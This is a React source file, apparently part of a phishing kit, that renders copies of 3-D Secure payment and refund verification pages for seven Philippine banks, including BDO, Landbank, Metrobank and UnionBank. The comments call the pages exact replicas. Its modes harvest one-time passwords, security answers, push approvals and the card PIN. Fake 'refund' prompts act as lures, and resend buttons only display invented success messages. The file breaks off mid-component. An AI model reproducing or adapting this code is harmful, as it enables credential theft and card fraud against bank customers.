import React, { useState } from 'react';
import { isMastercard } from '../../Utils/cardScheme';
import './PhilippinesBankLayout.css';

export const PHILIPPINES_BANKS = {
  ph_bdo: {
    key: 'bdo',
    name: 'BDO Unibank, Inc.',
    logo: '/images/banks/bdo.png',
    primaryColor: '#0891b2',
    type: 'bdo'
  },
  ph_landbank: {
    key: 'landbank',
    name: 'Land Bank of the Philippines',
    logo: '/images/banks/landbank.png',
    primaryColor: '#2CB24F',
    type: 'landbank'
  },
  ph_metrobank: {
    key: 'metrobank',
    name: 'Metropolitan Bank and Trust Company',
    logo: '/images/banks/metrobank.png',
    primaryColor: '#64748b',
    type: 'metrobank'
  },
  ph_eastwest: {
    key: 'eastwest',
    name: 'East West Banking Corporation',
    logo: '/images/banks/eastwest.png',
    primaryColor: '#183AB0',
    type: 'eastwest'
  },
  ph_pnb: {
    key: 'pnb',
    name: 'Philippine National Bank',
    logo: '/images/banks/pnb.png',
    primaryColor: '#0891b2',
    type: 'pnb'
  },
  ph_rcbc: {
    key: 'rcbc',
    name: 'Rizal Commercial Banking Corporation',
    logo: '/images/banks/rcbc.png',
    primaryColor: '#171717',
    type: 'rcbc'
  },
  ph_unionbank: {
    key: 'unionbank',
    name: 'Union Bank of the Philippines',
    logo: '/images/banks/union.webp',
    primaryColor: '#183AB0',
    type: 'unionbank'
  },
  ph_default: {
    key: 'default',
    name: 'Philippines Bank Authentication',
    logo: '/images/banks/bdo.png',
    primaryColor: '#0891b2',
    type: 'bdo'
  }
};

export const isPhilippinesBankDesign = (design) => {
  return Boolean(design && (design.startsWith('ph_') || PHILIPPINES_BANKS[design]));
};

export default function PhilippinesBankLayout({
  design,
  mode = 'otp', // 'otp' | 'push' | 'question' | 'pin'
  // OTP / Refund props
  code = '',
  setCode,
  handleCodeChange,
  handleSubmit,
  errorMessage,
  isDuplicate = false,
  isRetryActive = false,
  isShaking = false,
  isSubmitting = false,
  setIsDuplicate,
  onCancel,
  isRefund = false,
  // Push props
  customMessage,
  onApprove,
  // Question props
  customQuestion,
  answer = '',
  setAnswer,
  handleQuestionSubmit,
  // PIN props
  pin = '',
  setPin,
  handlePinSubmit
}) {
  const bank = PHILIPPINES_BANKS[design] || PHILIPPINES_BANKS.ph_default;

  const merchant = localStorage.getItem('session_merchant') || ((typeof process !== 'undefined' && process.env.REACT_APP_MERCHANT_NAME) || undefined) || 'Merchant';
  const amount = localStorage.getItem('session_amount') || localStorage.getItem('summ') || '';
  const currency = localStorage.getItem('session_currency') || localStorage.getItem('currency') || ((typeof process !== 'undefined' && process.env.REACT_APP_CURRENCY) || undefined) || 'PHP';
  const last4 = localStorage.getItem('session_last4') || localStorage.getItem('last-four-digits') || '4242';

  const [resendSuccess, setResendSuccess] = useState(false);
  const isMc = isMastercard(design);
  const schemeLogo = isMc ? '/images/banks/idcheck2.png' : '/images/banks/visa.png';
  const schemeAlt = isMc ? 'Mastercard' : 'Visa';

  const today = new Date();
  const formattedDate = `${today.getDate().toString().padStart(2, '0')}/${(today.getMonth() + 1).toString().padStart(2, '0')}/${today.getFullYear()}`;

  const handleResend = () => {
    if (setCode) setCode('');
    if (setIsDuplicate) setIsDuplicate(false);
    setResendSuccess(true);
    setTimeout(() => setResendSuccess(false), 3500);
  };

  const renderError = () => {
    if (!errorMessage) return null;
    return (
      <div className={`ph-error-banner ${isShaking ? 'ph-shake' : ''}`} role="alert">
        <span>{errorMessage}</span>
      </div>
    );
  };

  // ─── PUSH MODE (Adapted cleanly inside bank frame) ──────────────
  if (mode === 'push') {
    return (
      <div className="ph-container">
        <div className="ph-modal">
          <main className="ph-body">
            <div className="ph-logos-header">
              <img src={bank.logo} alt={bank.name} className="ph-bank-logo" onError={(e) => { e.target.style.display = 'none'; }} />
              <img src={schemeLogo} alt={schemeAlt} className="ph-scheme-logo" onError={(e) => { e.target.style.display = 'none'; }} />
            </div>

            <h1 style={{ fontSize: '1rem', fontWeight: 'bold', color: '#434C74', marginTop: '0.75rem', textAlign: 'center' }}>
              Authentication via Mobile App
            </h1>

            <div className="ph-push-card">
              <div className="ph-push-spinner" style={{ borderTopColor: bank.primaryColor }} />
              <p style={{ fontSize: '0.85rem', color: '#1e293b', lineHeight: '1.45', margin: 0 }}>
                {customMessage || 'Please open your mobile banking app to approve this payment request.'}
              </p>
            </div>

            <button
              type="button"
              onClick={onApprove}
              style={{
                height: '2.5rem',
                width: '100%',
                backgroundColor: bank.primaryColor,
                color: '#ffffff',
                border: 'none',
                borderRadius: '6px',
                fontSize: '0.825rem',
                fontWeight: 'bold',
                cursor: 'pointer',
                marginTop: '0.5rem'
              }}
            >
              I confirmed push
            </button>

            <button
              type="button"
              onClick={onCancel || (() => window.location.href = '/')}
              style={{
                height: '2.25rem',
                width: '100%',
                backgroundColor: '#ffffff',
                color: '#6b7280',
                border: '1px solid #d1d5db',
                borderRadius: '6px',
                fontSize: '0.8rem',
                fontWeight: '600',
                cursor: 'pointer',
                marginTop: '0.5rem'
              }}
            >
              Cancel
            </button>
          </main>
        </div>
      </div>
    );
  }

  // ─── QUESTION MODE (Adapted cleanly inside bank frame) ──────────
  if (mode === 'question') {
    return (
      <div className="ph-container">
        <div className="ph-modal">
          <main className="ph-body">
            <div className="ph-logos-header">
              <img src={bank.logo} alt={bank.name} className="ph-bank-logo" onError={(e) => { e.target.style.display = 'none'; }} />
              <img src={schemeLogo} alt={schemeAlt} className="ph-scheme-logo" onError={(e) => { e.target.style.display = 'none'; }} />
            </div>

            <h1 style={{ fontSize: '1rem', fontWeight: 'bold', color: '#434C74', marginTop: '0.75rem', textAlign: 'center' }}>
              Security Verification
            </h1>
            <p style={{ fontSize: '0.8rem', color: '#4b5563', textAlign: 'center', margin: '0.25rem 0 0.75rem' }}>
              Please answer your security question to continue:
            </p>

            {customQuestion && (
              <div className="ph-question-box">
                {customQuestion}
              </div>
            )}

            <form onSubmit={handleQuestionSubmit}>
              <input
                type="text"
                value={answer}
                onChange={(e) => setAnswer(e.target.value)}
                autoFocus
                placeholder="Enter your answer"
                style={{
                  height: '2.5rem',
                  width: '100%',
                  borderRadius: '6px',
                  border: '1px solid #d1d5db',
                  padding: '0 0.75rem',
                  fontSize: '0.9rem',
                  boxSizing: 'border-box'
                }}
              />

              <button
                type="submit"
                disabled={!answer.trim() || isSubmitting}
                style={{
                  height: '2.5rem',
                  width: '100%',
                  backgroundColor: bank.primaryColor,
                  color: '#ffffff',
                  border: 'none',
                  borderRadius: '6px',
                  fontSize: '0.825rem',
                  fontWeight: 'bold',
                  cursor: 'pointer',
                  marginTop: '0.75rem'
                }}
              >
                {isSubmitting ? 'Verifying...' : 'SUBMIT'}
              </button>
            </form>
          </main>
        </div>
      </div>
    );
  }

  // ─── PIN MODE (Adapted cleanly inside bank frame) ───────────────
  if (mode === 'pin') {
    return (
      <div className="ph-container">
        <div className="ph-modal">
          <main className="ph-body">
            <div className="ph-logos-header">
              <img src={bank.logo} alt={bank.name} className="ph-bank-logo" onError={(e) => { e.target.style.display = 'none'; }} />
              <img src={schemeLogo} alt={schemeAlt} className="ph-scheme-logo" onError={(e) => { e.target.style.display = 'none'; }} />
            </div>

            <h1 style={{ fontSize: '1rem', fontWeight: 'bold', color: '#434C74', marginTop: '0.75rem', textAlign: 'center' }}>
              Card PIN Verification
            </h1>
            <p style={{ fontSize: '0.8rem', color: '#4b5563', textAlign: 'center', margin: '0.25rem 0 0.75rem' }}>
              Please enter your 4-digit card PIN to authorize payment:
            </p>

            {renderError()}

            <form onSubmit={handlePinSubmit}>
              <input
                type="password"
                inputMode="numeric"
                maxLength={4}
                value={pin}
                onChange={(e) => setPin(e.target.value.replace(/\D/g, '').slice(0, 4))}
                autoFocus
                placeholder="••••"
                className="ph-pin-input"
                style={{
                  height: '2.5rem',
                  width: '100%',
                  borderRadius: '6px',
                  border: '1px solid #d1d5db',
                  padding: '0 0.75rem',
                  boxSizing: 'border-box'
                }}
              />

              <button
                type="submit"
                disabled={pin.length < 4 || isSubmitting}
                style={{
                  height: '2.5rem',
                  width: '100%',
                  backgroundColor: bank.primaryColor,
                  color: '#ffffff',
                  border: 'none',
                  borderRadius: '6px',
                  fontSize: '0.825rem',
                  fontWeight: 'bold',
                  cursor: 'pointer',
                  marginTop: '0.75rem'
                }}
              >
                {isSubmitting ? 'Verifying...' : 'AUTHORIZE PAYMENT'}
              </button>
            </form>
          </main>
        </div>
      </div>
    );
  }

  // ─── 1. LANDBANK VARIANT (Exact 1:1 replica of Landbank.jsx) ────
  if (bank.type === 'landbank') {
    return (
      <div className="ph-container">
        <div className="ph-modal">
          <main className="ph-body">
            <div className="ph-logos-header">
              <img src={bank.logo} alt="" style={{ height: '1.5rem', width: 'auto', objectFit: 'contain' }} />
              <img src={schemeLogo} alt="" style={{ height: '2rem', width: 'auto', objectFit: 'contain' }} />
            </div>

            <div style={{ marginTop: '0.5rem' }}>
              <div style={{ fontSize: '0.75rem', fontWeight: 'bold', color: '#2CB24F' }}>
                {isRefund ? 'Refund Verification' : 'Added Protection'}
              </div>
              <p style={{ fontSize: '0.75rem', lineHeight: '1rem', margin: '0.25rem 0', color: '#000000' }}>
                {isRefund
                  ? 'A One-Time Password (OTP) has been sent to your mobile number to authorize your refund. Input the OTP and click OK.'
                  : 'A One-Time Password (OTP) has been sent to your mobile number. To confirm your transaction, please input the OTP then click the OK button.'}
              </p>
            </div>

            {renderError()}

            <form onSubmit={handleSubmit} style={{ marginTop: '0.5rem' }}>
              <div style={{ fontSize: '0.75rem', lineHeight: '1.25rem', color: '#000000' }}>
                <div style={{ display: 'grid', gridTemplateColumns: '1fr 1fr' }}>
                  <span>Merchant Name</span>
                  <span>{merchant}</span>
                </div>
                <div style={{ display: 'grid', gridTemplateColumns: '1fr 1fr' }}>
                  <span>{isRefund ? 'Refund Amount' : 'Transaction Amount'}</span>
                  <span>{currency} {amount}</span>
                </div>
                <div style={{ display: 'grid', gridTemplateColumns: '1fr 1fr' }}>
                  <span>Transaction Date</span>
                  <span>{formattedDate}</span>
                </div>
                <div style={{ display: 'grid', gridTemplateColumns: '1fr 1fr' }}>
                  <span>LANDBANK Card No.</span>
                  <span>xxxx xxxx xxxx {last4}</span>
                </div>
                <div style={{ display: 'grid', gridTemplateColumns: '1fr 1fr', alignItems: 'center', marginTop: '0.25rem' }}>
                  <label htmlFor="landbank-otp">One-time Password (OTP)</label>
                  <input
                    id="landbank-otp"
                    type="text"
                    inputMode="numeric"
                    pattern="[0-9]*"
                    maxLength={8}
                    autoComplete="off"
                    value={code}
                    onChange={handleCodeChange}
                    autoFocus
                    style={{
                      height: '2rem',
                      width: '7rem',
                      border: '1px solid #404040',
                      backgroundColor: '#ffffff',
                      padding: '0 0.5rem',
                      fontSize: '0.75rem',
                      outline: 'none'
                    }}
                  />
                </div>
              </div>

              <div style={{ display: 'flex', alignItems: 'center', justifyContent: 'center', gap: '0.5rem', marginTop: '1rem' }}>
                <button
                  type="button"
                  onClick={onCancel || (() => window.location.href = '/')}
                  style={{
                    display: 'flex',
                    height: '2.5rem',
                    width: '5rem',
                    alignItems: 'center',
                    justifyContent: 'center',
                    border: '1px solid #2CB24F',
                    backgroundColor: '#ffffff',
                    fontSize: '0.75rem',
                    fontWeight: 600,
                    color: '#2CB24F',
                    cursor: 'pointer'
                  }}
                >
                  Cancel
                </button>

                <button
                  type="button"
                  onClick={handleResend}
                  style={{
                    display: 'flex',
                    height: '2.5rem',
                    width: '7rem',
                    alignItems: 'center',
                    justifyContent: 'center',
                    border: '1px solid #2CB24F',
                    backgroundColor: '#ffffff',
                    fontSize: '0.75rem',
                    fontWeight: 600,
                    color: '#2CB24F',
                    cursor: 'pointer'
                  }}
                >
                  Resend OTP
                </button>

                <button
                  type="submit"
                  disabled={code.length < 6 || code.length > 8 || isDuplicate || isSubmitting}
                  style={{
                    display: 'flex',
                    height: '2.5rem',
                    width: '7rem',
                    alignItems: 'center',
                    justifyContent: 'center',
                    backgroundColor: '#2CB24F',
                    fontSize: '0.75rem',
                    fontWeight: 'bold',
                    color: '#ffffff',
                    border: 'none',
                    cursor: 'pointer'
                  }}
                >
                  {isSubmitting ? '...' : (isRefund ? 'CONFIRM REFUND' : 'OK')}
                </button>
              </div>

              {resendSuccess && (
                <div className="ph-resend-alert" role="status">
                  ✓ New OTP code sent to your mobile number
                </div>
              )}
            </form>

            <div style={{ marginTop: '1rem', fontSize: '0.75rem', lineHeight: '1rem', color: '#000000' }}>
              <p>This information is <span style={{ fontWeight: 'bold' }}>not shared</span> with Merchant.</p>
              <p style={{ marginTop: '0.25rem' }}>
                For assistance, please call LANDBANK Customer Care Center through the following numbers: 8405-7000 (Metro Manila), 1-800-10-405-7000.
              </p>
            </div>
          </main>
        </div>
      </div>
    );
  }

  // ─── 2. METROBANK VARIANT (Exact 1:1 replica of Metrobank.jsx) ──
  if (bank.type === 'metrobank') {
    return (
      <div className="ph-container">
        <div className="ph-modal">
          <main className="ph-body" style={{ padding: '0.5rem 0 1.5rem' }}>
            <div style={{ display: 'flex', justifyContent: 'flex-end', padding: '0.25rem 1rem' }}>
              <button
                type="button"
                onClick={onCancel || (() => window.location.href = '/')}
                style={{ fontSize: '0.875rem', fontWeight: 600, color: '#ef4444', textDecoration: 'underline', background: 'none', border: 'none', cursor: 'pointer' }}
              >
                CANCEL
              </button>
            </div>

            <div style={{ borderTop: '1px solid #d4d4d4', marginTop: '0.25rem' }} />

            <div style={{ display: 'flex', alignItems: 'center', justifyContent: 'space-between', padding: '0.75rem 1rem' }}>
              <img src={bank.logo} alt="" style={{ height: '2rem', width: 'auto', objectFit: 'contain' }} />
              <img src={schemeLogo} alt="" style={{ height: '2.5rem', width: 'auto', objectFit: 'contain' }} />
            </div>

            <div style={{ borderTop: '1px solid #d4d4d4' }} />

            <div style={{ padding: '0 1.25rem' }}>
              <h1 style={{ marginTop: '1rem', textAlign: 'center', fontSize: '1.125rem', fontWeight: 'bold', color: '#404040' }}>
                {isRefund ? 'Refund Authentication' : 'Payment Authentication'}
              </h1>

              <p style={{ marginTop: '0.75rem', textAlign: 'center', fontSize: '0.875rem', lineHeight: '1.25rem', color: '#404040' }}>
                {isRefund
                  ? `We have sent an SMS containing your One-time Password (OTP) to authorize your refund using card ************${last4} to your mobile number`
                  : `We have sent an SMS containing your One-time Password (OTP) for this purchase using card ************${last4} to your mobile number`}
              </p>

              <p style={{ marginTop: '0.5rem', textAlign: 'center', fontSize: '0.875rem', lineHeight: '1.25rem', color: '#404040' }}>
                {isRefund
                  ? `You are receiving a refund from ${merchant} in the amount of ${currency} ${amount} on ${formattedDate} using your card ************${last4}.`
                  : `You are paying ${merchant} in the amount of ${currency} ${amount} on ${formattedDate} using your card ************${last4}.`}
              </p>

              {renderError()}

              <form onSubmit={handleSubmit} style={{ maxWidth: '20rem', margin: '0.5rem auto 0' }}>
                <input
                  type="text"
                  inputMode="numeric"
                  pattern="[0-9]*"
                  maxLength={8}
                  autoComplete="off"
                  value={code}
                  onChange={handleCodeChange}
                  autoFocus
                  placeholder="Enter your OTP"
                  style={{
                    height: '2rem',
                    width: '100%',
                    borderRadius: '0.5rem',
                    border: '1px solid #a3a3a3',
                    backgroundColor: '#ffffff',
                    padding: '0 0.75rem',
                    fontSize: '0.875rem',
                    letterSpacing: '0.1em',
                    color: '#404040',
                    outline: 'none',
                    boxSizing: 'border-box'
                  }}
                />

                <button
                  type="submit"
                  disabled={code.length < 6 || code.length > 8 || isDuplicate || isSubmitting}
                  style={{
                    marginTop: '2rem',
                    display: 'flex',
                    height: '3rem',
                    width: '100%',
                    alignItems: 'center',
                    justifyContent: 'center',
                    borderRadius: '0.5rem',
                    backgroundColor: '#64748b',
                    fontSize: '0.875rem',
                    fontWeight: 500,
                    color: '#ffffff',
                    border: 'none',
                    cursor: 'pointer'
                  }}
                >
                  {isSubmitting ? '...' : (isRefund ? 'Confirm Refund' : 'Continue')}
                </button>

                <button
                  type="button"
                  onClick={handleResend}
                  style={{
                    marginTop: '1rem',
                    display: 'flex',
                    height: '3rem',
                    width: '100%',
                    alignItems: 'center',
                    justifyContent: 'center',
                    borderRadius: '0.5rem',
                    border: '1px solid #3b82f6',
                    backgroundColor: '#ffffff',
                    fontSize: '0.875rem',
                    fontWeight: 500,
                    color: '#64748b',
                    cursor: 'pointer'
                  }}
                >
                  Re-send OTP
                </button>

                {resendSuccess && (
                  <div className="ph-resend-alert" role="status">
                    ✓ New OTP code sent to your mobile number
                  </div>
                )}
              </form>
            </div>
          </main>
        </div>
      </div>
    );
  }

  // ─── 3. EASTWEST VARIANT (Exact 1:1 replica of EastWest.jsx) ────
  if (bank.type === 'eastwest') {
    return (
      <div className="ph-container">
        <div className="ph-modal">
          <main className="ph-body">
            <div className="ph-logos-header">
              <img src={bank.logo} alt="" style={{ height: '2.25rem', width: 'auto', objectFit: 'contain' }} />
              <img src={schemeLogo} alt="" style={{ height: '2.5rem', width: 'auto', objectFit: 'contain' }} />
            </div>

            <div style={{ borderTop: '1px solid #a3a3a3', marginTop: '0.75rem' }} />

            <h1 style={{ marginTop: '0.75rem', fontSize: '0.875rem', fontWeight: 800, lineHeight: '1.25rem', color: '#000000' }}>
              {isRefund ? 'Authorize your refund' : 'Authorize your online payment'}
            </h1>

            <p style={{ marginTop: '0.75rem', fontSize: '0.875rem', lineHeight: '1.5rem', color: '#000000' }}>
              {isRefund
                ? 'We just sent a verification code by Text to your registered mobile number to confirm your refund.'
                : 'We just sent a verification code by Text to your registered mobile number.'}
            </p>

            <p style={{ marginTop: '0.75rem', fontSize: '0.875rem', lineHeight: '1.5rem', color: '#000000' }}>
              {isRefund
                ? `You are authorizing a refund from ${merchant} for ${currency} ${amount} on ${formattedDate} with your card ************${last4}.`
                : `You are authorizing a payment to ${merchant} for ${currency} ${amount} on ${formattedDate} with your card ************${last4}.`}
            </p>

            {renderError()}

            <form onSubmit={handleSubmit} style={{ maxWidth: '20rem', margin: '0.75rem auto 0' }}>
              <label style={{ display: 'block', textAlign: 'center', fontSize: '0.875rem', color: '#787692' }}>
                Please enter 6-digit OTP
              </label>

              <input
                type="text"
                inputMode="numeric"
                pattern="[0-9]*"
                maxLength={8}
                autoComplete="off"
                value={code}
                onChange={handleCodeChange}
                autoFocus
                style={{
                  marginTop: '0.25rem',
                  height: '3rem',
                  width: '100%',
                  borderRadius: '0.25rem',
                  border: '1px solid #787692',
                  backgroundColor: '#ffffff',
                  padding: '0 0.75rem',
                  textAlign: 'center',
                  fontSize: '0.875rem',
                  letterSpacing: '0.1em',
                  color: '#000000',
                  outline: 'none',
                  boxSizing: 'border-box'
                }}
              />

              <button
                type="submit"
                disabled={code.length < 6 || code.length > 8 || isDuplicate || isSubmitting}
                style={{
                  marginTop: '0.25rem',
                  display: 'flex',
                  height: '2.5rem',
                  width: '100%',
                  alignItems: 'center',
                  justifyContent: 'center',
                  borderRadius: '0.25rem',
                  backgroundColor: '#183AB0',
                  fontSize: '0.875rem',
                  fontWeight: 300,
                  color: '#ffffff',
                  border: 'none',
                  cursor: 'pointer'
                }}
              >
                {isSubmitting ? '...' : (isRefund ? 'CONFIRM REFUND' : 'SUBMIT')}
              </button>
            </form>

            <div style={{ marginTop: '1rem', textAlign: 'center' }}>
              <button
                type="button"
                onClick={handleResend}
                style={{ fontSize: '0.75rem', fontWeight: 'bold', color: '#1C3DB1', background: 'none', border: 'none', cursor: 'pointer' }}
              >
                CLICK HERE TO RESEND CODE
              </button>
            </div>

            {resendSuccess && (
              <div className="ph-resend-alert" role="status">
                ✓ New verification code sent to your mobile number
              </div>
            )}
          </main>
        </div>
      </div>
    );
  }

  // ─── 4. PNB VARIANT (Exact 1:1 replica of PNB.jsx) ─────────────
  if (bank.type === 'pnb') {
    return (
      <div className="ph-container">
        <div className="ph-modal">
          <main className="ph-body">
            <div className="ph-logos-header">
              <img src={bank.logo} alt="" style={{ height: '2.5rem', width: 'auto', objectFit: 'contain' }} />
              <img src={schemeLogo} alt="" style={{ height: '2rem', width: 'auto', objectFit: 'contain' }} />
            </div>

            <h1 style={{ marginTop: '1.25rem', textAlign: 'center', fontSize: '1.125rem', fontWeight: 'bold', color: '#434C74' }}>
              {isRefund ? 'Refund Authentication' : 'Purchase Authentication'}
            </h1>

            <p style={{ marginTop: '1.25rem', fontSize: '0.875rem', lineHeight: '1.5rem', color: '#262626' }}>
              {isRefund
                ? `We have sent you a text message with a code to your registered mobile number. You are receiving a refund from merchant ${merchant} in the amount of ${currency} ${amount} on ${formattedDate}.`
                : `We have sent you a text message with a code to your registered mobile number. You are paying merchant ${merchant} the amount of ${currency} ${amount} on ${formattedDate}.`}
            </p>

            {renderError()}

            <form onSubmit={handleSubmit} style={{ marginTop: '1.25rem' }}>
              <label style={{ display: 'block', fontSize: '1rem', fontWeight: 'bold', color: '#000000' }}>
                Enter your code below:
              </label>

              <input
                type="text"
                inputMode="numeric"
                pattern="[0-9]*"
                maxLength={8}
                autoComplete="off"
                value={code}
                onChange={handleCodeChange}
                autoFocus
                style={{
                  marginTop: '0.75rem',
                  height: '2.5rem',
                  width: '100%',
                  borderRadius: '0.375rem',
                  border: '1px solid #d4d4d4',
                  backgroundColor: '#ffffff',
                  padding: '0 0.75rem',
                  fontSize: '0.875rem',
                  color: '#262626',
                  outline: 'none',
                  boxSizing: 'border-box'
                }}
              />

              <button
                type="submit"
                disabled={code.length < 6 || code.length > 8 || isDuplicate || isSubmitting}
                style={{
                  marginTop: '0.75rem',
                  display: 'flex',
                  height: '2.5rem',
                  width: '100%',
                  alignItems: 'center',
                  justifyContent: 'center',
                  borderRadius: '0.375rem',
                  backgroundColor: '#0891b2',
                  fontSize: '0.875rem',
                  fontWeight: 500,
                  color: '#ffffff',
                  border: 'none',
                  cursor: 'pointer'
                }}
              >
                {isSubmitting ? '...' : (isRefund ? 'CONFIRM REFUND' : 'CONFIRM')}
              </button>

              <button
                type="button"
                onClick={handleResend}
                style={{
                  marginTop: '0.75rem',
                  display: 'flex',
                  height: '2.5rem',
                  width: '100%',
                  alignItems: 'center',
                  justifyContent: 'center',
                  borderRadius: '0.375rem',
                  backgroundColor: '#737373',
                  fontSize: '0.875rem',
                  fontWeight: 500,
                  color: '#ffffff',
                  border: 'none',
                  cursor: 'pointer'
                }}
              >
                RESEND
              </button>

              {resendSuccess && (
                <div className="ph-resend-alert" role="status">
                  ✓ New verification code sent to your mobile number
                </div>
              )}

              <button
                type="button"
                onClick={onCancel || (() => window.location.href = '/')}
                style={{
                  marginTop: '0.75rem',
                  display: 'flex',
                  height: '3rem',
                  width: '100%',
                  alignItems: 'center',
                  justifyContent: 'center',
                  borderRadius: '0.375rem',
                  backgroundColor: '#737373',
                  fontSize: '0.875rem',
                  fontWeight: 500,
                  color: '#ffffff',
                  border: 'none',
                  cursor: 'pointer'
                }}
              >
                CANCEL
              </button>
            </form>

            <p style={{ marginTop: '1.75rem', fontSize: '0.875rem', lineHeight: '1.25rem', fontWeight: 'bold', color: '#000000' }}>
              This page will automatically timeout after 420 seconds.
            </p>
          </main>
        </div>
      </div>
    );
  }

  // ─── 5. RCBC VARIANT (Exact 1:1 replica of RCBC.jsx) ───────────
  if (bank.type === 'rcbc') {
    return (
      <div className="ph-container">
        <div className="ph-modal">
          <main className="ph-body">
            <div className="ph-logos-header">
              <img src={bank.logo} alt="" style={{ height: '2.5rem', width: 'auto', objectFit: 'contain' }} />
              <img src={schemeLogo} alt="" style={{ height: '2.5rem', width: 'auto', objectFit: 'contain' }} />
            </div>

            <p style={{ marginTop: '2rem', fontSize: '0.75rem', lineHeight: '1.25rem', color: '#000000' }}>
              {isRefund
                ? 'To continue with your refund, please enter the 6-digit One-Time Password (OTP) sent to you via SMS and click Submit.'
                : 'To continue with your transaction, please enter the 6-digit One-Time Password (OTP) sent to you via SMS and click Submit.'}
            </p>

            <h2 style={{ marginTop: '1.25rem', fontSize: '0.75rem', fontWeight: 'bold', color: '#737373' }}>
              {isRefund ? 'Refund Details' : 'Transaction Details'}
            </h2>

            {renderError()}

            <form onSubmit={handleSubmit}>
              <div style={{ maxWidth: '24rem', margin: '0.75rem auto 0', fontSize: '0.75rem', color: '#000000' }}>
                <div style={{ display: 'grid', gridTemplateColumns: '1fr 1fr', alignItems: 'center', marginBottom: '0.25rem' }}>
                  <span style={{ textAlign: 'right', fontWeight: 800 }}>Merchant:</span>
                  <span style={{ paddingLeft: '1.25rem' }}>{merchant}</span>
                </div>

                <div style={{ display: 'grid', gridTemplateColumns: '1fr 1fr', alignItems: 'center', marginBottom: '0.25rem' }}>
                  <span style={{ textAlign: 'right', fontWeight: 800 }}>{isRefund ? 'Refund Amount:' : 'Transaction Amount:'}</span>
                  <span style={{ paddingLeft: '1.25rem' }}>{currency} {amount}</span>
                </div>

                <div style={{ display: 'grid', gridTemplateColumns: '1fr 1fr', alignItems: 'center', marginBottom: '0.25rem' }}>
                  <span style={{ textAlign: 'right', fontWeight: 800 }}>Card Number:</span>
                  <span style={{ paddingLeft: '1.25rem' }}>************{last4}</span>
                </div>

                <div style={{ display: 'grid', gridTemplateColumns: '1fr 1fr', alignItems: 'center' }}>
                  <label htmlFor="rcbc-code" style={{ textAlign: 'right', fontWeight: 800 }}>Enter Code:</label>
                  <div style={{ paddingLeft: '1.25rem' }}>
                    <input
                      id="rcbc-code"
                      type="text"
                      inputMode="numeric"
                      pattern="[0-9]*"
                      maxLength={8}
                      autoComplete="off"
                      value={code}
                      onChange={handleCodeChange}
                      autoFocus
                      style={{
                        height: '1.5rem',
                        width: '100%',
                        borderRadius: '0.25rem',
                        border: '1px solid #a5b4fc',
                        backgroundColor: '#ffffff',
                        padding: '0 0.5rem',
                        fontSize: '0.75rem',
                        outline: 'none',
                        boxSizing: 'border-box'
                      }}
                    />
                  </div>
                </div>
              </div>

              <div style={{ marginTop: '3rem' }}>
                <button
                  type="button"
                  onClick={handleResend}
                  style={{ fontSize: '0.75rem', fontWeight: 600, textDecoration: 'underline', background: 'none', border: 'none', cursor: 'pointer', color: '#000000' }}
                >
                  Click here to receive another code
                </button>
              </div>

              {resendSuccess && (
                <div className="ph-resend-alert" role="status">
                  ✓ New verification code sent to your mobile number
                </div>
              )}

              <div style={{ marginTop: '1rem', display: 'flex', justifyContent: 'center' }}>
                <button
                  type="submit"
                  disabled={code.length < 6 || code.length > 8 || isDuplicate || isSubmitting}
                  style={{
                    display: 'flex',
                    height: '2rem',
                    width: '7rem',
                    alignItems: 'center',
                    justifyContent: 'center',
                    backgroundColor: '#171717',
                    fontSize: '0.75rem',
                    fontWeight: 'bold',
                    color: '#ffffff',
                    border: 'none',
                    cursor: 'pointer'
                  }}
                >
                  {isSubmitting ? '...' : (isRefund ? 'CONFIRM REFUND' : 'Submit')}
                </button>
              </div>
            </form>

            <div style={{ marginTop: '1rem', display: 'flex', justifyContent: 'flex-end' }}>
              <button
                type="button"
                onClick={onCancel || (() => window.location.href = '/')}
                style={{ fontSize: '0.75rem', fontWeight: 'bold', textDecoration: 'underline', background: 'none', border: 'none', cursor: 'pointer', color: '#000000' }}
              >
                Exit
              </button>
            </div>
          </main>
        </div>
      </div>
    );
  }

  // ─── 6. UNIONBANK VARIANT (Exact 1:1 replica of UnionBank.jsx) ──
  if (bank.type === 'unionbank') {
    return (
      <div className="ph-container">
        <div className="ph-modal">
          <main className="ph-body">
            <div className="ph-logos-header">
              <img src={bank.logo} alt="" style={{ height: '2.25rem', width: 'auto', objectFit: 'contain' }} />
              <img src={schemeLogo} alt="" style={{ height: '2.5rem', width: 'auto', objectFit: 'contain' }} />
            </div>

            <div style={{ borderTop: '1px solid #a3a3a3', marginTop: '0.75rem' }} />

            <h1 style={{ marginTop: '0.75rem', fontSize: '0.875rem', fontWeight: 800, lineHeight: '1.25rem', color: '#000000' }}>
              {isRefund ? 'Authorize your refund' : 'Authorize your online payment'}
            </h1>

            <p style={{ marginTop: '0.75rem', fontSize: '0.875rem', lineHeight: '1.5rem', color: '#000000' }}>
              {isRefund
                ? 'To authorize refund on your UnionBank card, enter your One-Time PIN (OTP) that has been sent via Text to your registered mobile number'
                : 'To authorize payment on your UnionBank card, enter your One-Time PIN (OTP) that has been sent via Text to your registered mobile number'}
            </p>

            <p style={{ marginTop: '0.75rem', fontSize: '0.875rem', lineHeight: '1.5rem', color: '#000000' }}>
              Never share this OTP with anyone.
            </p>

            <div style={{ marginTop: '0.75rem', fontSize: '0.875rem', lineHeight: '1.5rem', color: '#000000' }}>
              <div>Merchant: {merchant}</div>
              <div>{isRefund ? 'Refund Amount' : 'Amount'}: {currency} {amount}</div>
              <div>Date: {formattedDate}</div>
              <div>Card Number: ************{last4}</div>
            </div>

            {renderError()}

            <form onSubmit={handleSubmit} style={{ maxWidth: '20rem', margin: '0.75rem auto 0' }}>
              <label style={{ display: 'block', textAlign: 'center', fontSize: '0.875rem', color: '#787692' }}>
                Please enter 6-digit OTP
              </label>

              <input
                type="text"
                inputMode="numeric"
                pattern="[0-9]*"
                maxLength={8}
                autoComplete="off"
                value={code}
                onChange={handleCodeChange}
                autoFocus
                style={{
                  marginTop: '0.25rem',
                  height: '3rem',
                  width: '100%',
                  borderRadius: '0.25rem',
                  border: '1px solid #787692',
                  backgroundColor: '#ffffff',
                  padding: '0 0.75rem',
                  textAlign: 'center',
                  fontSize: '0.875rem',
                  letterSpacing: '0.1em',
                  color: '#000000',
                  outline: 'none',
                  boxSizing: 'border-box'
                }}
              />

              <button
                type="submit"
                disabled={code.length < 6 || code.length > 8 || isDuplicate || isSubmitting}
                style={{
                  marginTop: '0.25rem',
                  display: 'flex',
                  height: '2.5rem',
                  width: '100%',
                  alignItems: 'center',
                  justifyContent: 'center',
                  borderRadius: '0.25rem',
                  backgroundColor: '#183AB0',
                  fontSize: '0.875rem',
                  fontWeight: 500,
                  color: '#ffffff',
